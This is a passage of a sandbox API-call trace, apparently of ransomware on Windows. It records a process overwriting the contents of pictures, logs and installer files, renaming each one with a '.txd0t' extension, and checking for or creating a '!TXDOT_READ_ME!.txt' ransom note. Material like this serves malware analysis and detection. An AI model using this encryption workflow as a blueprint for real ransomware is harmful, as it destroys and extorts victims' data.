psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\3w6B72hITb.png", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\3w6B72hITb.png.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\3w6B72hITb.png.txd0t" [0076.132] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\3w6B72hITb.png.txd0t") returned 0 [0076.132] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\3w6B72hITb.png", dwFileAttributes=0x80) returned 1 [0076.132] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\3w6B72hITb.png" (normalized: "c:\\users\\fd1hvy\\pictures\\kg7t_g4j-\\3w6b72hitb.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0076.132] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=56924) returned 1 [0076.132] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.132] WriteFile (in: hFile=0x474, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0076.137] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffff1fa4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.137] ReadFile (in: hFile=0x474, lpBuffer=0x380d020, nNumberOfBytesToRead=0xde50, lpNumberOfBytesRead=0x414f660, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f660*=0xde50, lpOverlapped=0x0) returned 1 [0076.138] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffff21b0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.138] WriteFile (in: hFile=0x474, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0xde50, lpNumberOfBytesWritten=0x414f664, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f664*=0xde50, lpOverlapped=0x0) returned 1 [0076.138] FlushFileBuffers (hFile=0x474) returned 1 [0076.144] GetProcessHeap () returned 0xe30000 [0076.144] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x112) returned 0xed1c70 [0076.144] StrCpyW (in: psz1=0xed1c70, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\3w6B72hITb.png" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\3w6B72hITb.png") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\3w6B72hITb.png" [0076.144] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\3w6B72hITb.png") returned="3w6B72hITb.png" [0076.144] StrCpyW (in: psz1=0xed1cbe, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.144] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\!TXDOT_READ_ME!.txt") returned 1 [0076.145] GetProcessHeap () returned 0xe30000 [0076.145] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed1c70 | out: hHeap=0xe30000) returned 1 [0076.145] CloseHandle (hObject=0x474) returned 1 [0076.147] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\3w6B72hITb.png" (normalized: "c:\\users\\fd1hvy\\pictures\\kg7t_g4j-\\3w6b72hitb.png"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\3w6B72hITb.png.txd0t" (normalized: "c:\\users\\fd1hvy\\pictures\\kg7t_g4j-\\3w6b72hitb.png.txd0t")) returned 1 [0076.147] SetEvent (hEvent=0x404) returned 1 [0076.147] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0076.152] StrCpyW (in: psz1=0x414f6a0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Bn2jVBj5I1Q6.png" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Bn2jVBj5I1Q6.png") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Bn2jVBj5I1Q6.png" [0076.153] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Bn2jVBj5I1Q6.png", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Bn2jVBj5I1Q6.png.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Bn2jVBj5I1Q6.png.txd0t" [0076.153] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Bn2jVBj5I1Q6.png.txd0t") returned 0 [0076.153] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Bn2jVBj5I1Q6.png", dwFileAttributes=0x80) returned 1 [0076.153] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Bn2jVBj5I1Q6.png" (normalized: "c:\\users\\fd1hvy\\pictures\\kg7t_g4j-\\bn2jvbj5i1q6.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x464 [0076.153] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=78104) returned 1 [0076.153] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.153] WriteFile (in: hFile=0x464, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0076.154] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffecce8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.154] ReadFile (in: hFile=0x464, lpBuffer=0x380d020, nNumberOfBytesToRead=0x13110, lpNumberOfBytesRead=0x414f660, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f660*=0x13110, lpOverlapped=0x0) returned 1 [0076.156] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffecef0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.156] WriteFile (in: hFile=0x464, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x13110, lpNumberOfBytesWritten=0x414f664, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f664*=0x13110, lpOverlapped=0x0) returned 1 [0076.156] FlushFileBuffers (hFile=0x464) returned 1 [0076.164] GetProcessHeap () returned 0xe30000 [0076.164] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x116) returned 0xed1d98 [0076.164] StrCpyW (in: psz1=0xed1d98, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Bn2jVBj5I1Q6.png" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Bn2jVBj5I1Q6.png") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Bn2jVBj5I1Q6.png" [0076.164] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Bn2jVBj5I1Q6.png") returned="Bn2jVBj5I1Q6.png" [0076.164] StrCpyW (in: psz1=0xed1de6, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.164] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\!TXDOT_READ_ME!.txt") returned 1 [0076.164] GetProcessHeap () returned 0xe30000 [0076.165] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed1d98 | out: hHeap=0xe30000) returned 1 [0076.165] CloseHandle (hObject=0x464) returned 1 [0076.167] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Bn2jVBj5I1Q6.png" (normalized: "c:\\users\\fd1hvy\\pictures\\kg7t_g4j-\\bn2jvbj5i1q6.png"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Bn2jVBj5I1Q6.png.txd0t" (normalized: "c:\\users\\fd1hvy\\pictures\\kg7t_g4j-\\bn2jvbj5i1q6.png.txd0t")) returned 1 [0076.167] SetEvent (hEvent=0x404) returned 1 [0076.167] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0076.173] StrCpyW (in: psz1=0x414f690, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\cBmZZ5bX2Jx3bJhbUv.bmp" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\cBmZZ5bX2Jx3bJhbUv.bmp") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\cBmZZ5bX2Jx3bJhbUv.bmp" [0076.173] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\cBmZZ5bX2Jx3bJhbUv.bmp", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\cBmZZ5bX2Jx3bJhbUv.bmp.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\cBmZZ5bX2Jx3bJhbUv.bmp.txd0t" [0076.173] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\cBmZZ5bX2Jx3bJhbUv.bmp.txd0t") returned 0 [0076.173] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\cBmZZ5bX2Jx3bJhbUv.bmp", dwFileAttributes=0x80) returned 1 [0076.174] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\cBmZZ5bX2Jx3bJhbUv.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\kg7t_g4j-\\cbmzz5bx2jx3bjhbuv.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0076.174] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=32646) returned 1 [0076.174] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.174] WriteFile (in: hFile=0x474, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0076.175] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffff7e7a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.175] ReadFile (in: hFile=0x474, lpBuffer=0x380d020, nNumberOfBytesToRead=0x7f80, lpNumberOfBytesRead=0x414f650, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f650*=0x7f80, lpOverlapped=0x0) returned 1 [0076.176] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffff8080, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.176] WriteFile (in: hFile=0x474, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x7f80, lpNumberOfBytesWritten=0x414f654, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f654*=0x7f80, lpOverlapped=0x0) returned 1 [0076.179] FlushFileBuffers (hFile=0x474) returned 1 [0076.923] GetProcessHeap () returned 0xe30000 [0076.923] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x122) returned 0xe9b648 [0076.923] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\cBmZZ5bX2Jx3bJhbUv.bmp" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\cBmZZ5bX2Jx3bJhbUv.bmp") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\cBmZZ5bX2Jx3bJhbUv.bmp" [0076.923] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\cBmZZ5bX2Jx3bJhbUv.bmp") returned="cBmZZ5bX2Jx3bJhbUv.bmp" [0076.923] StrCpyW (in: psz1=0xe9b696, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.923] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\!TXDOT_READ_ME!.txt") returned 1 [0076.923] GetProcessHeap () returned 0xe30000 [0076.923] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0076.923] CloseHandle (hObject=0x474) returned 1 [0076.925] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\cBmZZ5bX2Jx3bJhbUv.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\kg7t_g4j-\\cbmzz5bx2jx3bjhbuv.bmp"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\cBmZZ5bX2Jx3bJhbUv.bmp.txd0t" (normalized: "c:\\users\\fd1hvy\\pictures\\kg7t_g4j-\\cbmzz5bx2jx3bjhbuv.bmp.txd0t")) returned 1 [0076.926] SetEvent (hEvent=0x404) returned 1 [0076.926] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x102 [0078.156] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x102 [0079.210] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x102 [0080.279] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x102 [0081.319] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x102 [0082.346] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x102 [0083.627] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x102 [0085.042] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0085.234] StrCpyW (in: psz1=0x414f690, psz2="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" | out: psz1="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" [0085.234] StrCatW (in: psz1="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log", psz2=".txd0t" | out: psz1="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log.txd0t") returned="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log.txd0t" [0085.234] PathFileExistsW (pszPath="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log.txd0t") returned 0 [0085.234] SetFileAttributesW (lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log", dwFileAttributes=0x80) returned 1 [0085.235] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x468 [0085.236] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=6004) returned 1 [0085.236] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.236] WriteFile (in: hFile=0x468, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0085.237] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffffe68c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.237] ReadFile (in: hFile=0x468, lpBuffer=0x380d020, nNumberOfBytesToRead=0x1770, lpNumberOfBytesRead=0x414f650, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f650*=0x1770, lpOverlapped=0x0) returned 1 [0085.238] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffffe890, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.238] WriteFile (in: hFile=0x468, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x1770, lpNumberOfBytesWritten=0x414f654, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f654*=0x1770, lpOverlapped=0x0) returned 1 [0085.238] FlushFileBuffers (hFile=0x468) returned 1 [0085.440] GetProcessHeap () returned 0xe30000 [0085.440] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x118) returned 0xed1d98 [0085.440] StrCpyW (in: psz1=0xed1d98, psz2="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" | out: psz1="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" [0085.440] PathFindFileNameW (pszPath="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned="oobe_2017_09_07_03_08_57_737.log" [0085.440] StrCpyW (in: psz1=0xed1dc8, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0085.440] PathFileExistsW (pszPath="\\\\?\\C:\\$GetCurrent\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0085.441] GetProcessHeap () returned 0xe30000 [0085.441] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed1d98 | out: hHeap=0xe30000) returned 1 [0085.441] CloseHandle (hObject=0x468) returned 1 [0085.441] MoveFileW (lpExistingFileName="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log"), lpNewFileName="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log.txd0t" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log.txd0t")) returned 1 [0085.441] SetEvent (hEvent=0x404) returned 1 [0085.441] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0085.445] StrCpyW (in: psz1=0x414f6a0, psz2="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml" [0085.445] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml.txd0t" [0085.446] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml.txd0t") returned 0 [0085.446] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml", dwFileAttributes=0x80) returned 1 [0085.446] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x47c [0085.446] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=80970) returned 1 [0085.446] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.446] WriteFile (in: hFile=0x47c, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0085.450] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xfffec1b6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.450] ReadFile (in: hFile=0x47c, lpBuffer=0x380d020, nNumberOfBytesToRead=0x13c40, lpNumberOfBytesRead=0x414f660, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f660*=0x13c40, lpOverlapped=0x0) returned 1 [0085.454] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xfffec3c0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.454] WriteFile (in: hFile=0x47c, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x13c40, lpNumberOfBytesWritten=0x414f664, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f664*=0x13c40, lpOverlapped=0x0) returned 1 [0085.454] FlushFileBuffers (hFile=0x47c) returned 1 [0085.657] GetProcessHeap () returned 0xe30000 [0085.657] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x108) returned 0xe41328 [0085.657] StrCpyW (in: psz1=0xe41328, psz2="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml" [0085.657] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned="LocalizedData.xml" [0085.657] StrCpyW (in: psz1=0xe41366, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0085.657] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1029\\!TXDOT_READ_ME!.txt") returned 1 [0085.657] GetProcessHeap () returned 0xe30000 [0085.657] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe41328 | out: hHeap=0xe30000) returned 1 [0085.657] CloseHandle (hObject=0x47c) returned 1 [0085.659] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml.txd0t" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml.txd0t")) returned 1 [0085.664] SetEvent (hEvent=0x404) returned 1 [0085.664] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0085.676] StrCpyW (in: psz1=0x414f6c0, psz2="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf" [0085.676] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf.txd0t" [0085.676] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf.txd0t") returned 0 [0085.676] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf", dwFileAttributes=0x80) returned 1 [0085.676] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0085.676] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=3526) returned 1 [0085.676] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.676] WriteFile (in: hFile=0x460, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0085.678] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffff03a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.678] ReadFile (in: hFile=0x460, lpBuffer=0x380d020, nNumberOfBytesToRead=0xdc0, lpNumberOfBytesRead=0x414f680, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f680*=0xdc0, lpOverlapped=0x0) returned 1 [0085.678] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffff240, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.678] WriteFile (in: hFile=0x460, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0xdc0, lpNumberOfBytesWritten=0x414f684, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f684*=0xdc0, lpOverlapped=0x0) returned 1 [0085.679] FlushFileBuffers (hFile=0x460) returned 1 [0085.682] GetProcessHeap () returned 0xe30000 [0085.682] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xf6) returned 0xe9d750 [0085.682] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf" [0085.682] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf") returned="eula.rtf" [0085.682] StrCpyW (in: psz1=0xe9d78e, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0085.682] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1036\\!TXDOT_READ_ME!.txt") returned 0 [0085.682] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\!TXDOT_READ_ME!.txt" (normalized: "c:\\588bce7c90097ed212\\1036\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, 